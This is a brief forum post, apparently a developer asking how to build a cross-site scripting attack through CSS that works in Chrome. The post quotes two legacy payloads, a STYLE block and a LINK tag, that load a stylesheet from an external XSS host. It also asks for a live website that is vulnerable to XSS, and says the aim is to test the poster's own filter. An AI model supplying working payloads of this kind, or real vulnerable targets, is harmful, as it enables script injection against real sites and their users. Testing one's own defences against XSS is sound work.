Can anyone teach me how to create a XSS using CSS. It can be somethings like :
<STYLE type="text/css"> BODY{ background:url("http://ha.ckers.org/xss.css")}</STYLE>
or
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
(source from https://gist.github.com/sseffa/11031135) but too bad above coding cannot work. I wondering is there somethings i miss out??
Edited
I do read from many other place include Cross Site Scripting in CSS Stylesheets but most of those cannot work. I tested the HTC and IE still cannot work. But actually i wish to create one and work at Google Chrome. Please help me to make it. Simple will do.
OR anyone can show me a reallife website with XSS using CSS. I need to test my coding is it able to block the XSS.
Sorry for my bad english. Thanks for read through here.